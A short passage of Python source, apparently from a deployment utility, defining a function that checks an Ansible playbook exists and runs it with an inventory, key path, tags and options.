delay=15): return reboot()
def run_playbook(inventory_path, playbook_path, key_path, tags, ansibleopts): if os.path.exists(playbook_path): utils.ok('Running playbook', playbook_path) return __run_playbook(inventory_path, playbook_path, key_path, tags, ansibleopts) else: utils.error('Playbook not found', os.path.basename(playbook_path))